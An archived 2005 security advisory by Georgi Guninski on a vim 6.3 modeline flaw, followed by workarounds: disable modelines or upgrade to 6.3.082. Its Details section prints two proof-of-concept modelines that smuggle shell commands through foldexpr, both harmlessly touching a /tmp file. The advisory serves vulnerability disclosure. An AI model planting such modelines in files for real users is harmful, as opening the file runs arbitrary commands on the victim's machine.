lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20050725153300.GC7380@sivokote.iziade.m$> Date: Mon Jul 25 16:32:04 2005 From: guninski at guninski.com (Georgi Guninski) Subject: Help poor children in Uganda Georgi Guninski security advisory #75, 2005 Help poor children in Uganda Systems affected: vim 6.3 Date: 25 July 2005 Legal Notice: This Advisory is Copyright (c) 2005 Georgi Guninski. You may not modify it and distribute it or distribute parts of it without the author's written permission - this especially applies to so called "vulnerabilities databases" and securityfocus, microsoft, cert and mitre. If you want to link to this content use the URL: http://www.guninski.com/where_do_you_want_billg_to_go_today_5.html Anything in this document may change without notice. Disclaimer: The information in this advisory is believed to be true though it may be false. The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this advisory or program. Georgi Guninski bears no responsibility for content or misuse of this advisory or program or any derivatives thereof. Description: open file in vim 6.3 < 6.3.082 with modelines on, got owned. Details: --1-- vim: foldmethod=expr:foldexpr=glob("`touch\ /tmp/where_do_you_want_bill_gates_to_go_today\?`"): cannot be used in vulnerability databases. ----- --2-- vim: foldmethod=expr:foldexpr=expand("$(touch$IFS/tmp/where_do_you_want_billg_to_go\?)"): cannot be used in vulnerability databases. ----- Workaround: 1. (preferred) Disable modelines via set modelines=0 and/or set nomodeline in .vimrc or 2. upgrade to 6.3.082 - patch available at: ftp://ftp.vim.org/pub/vim/patches/6.3/ -- where do you want bill gates to go today?
Powered by blists - more mailing lists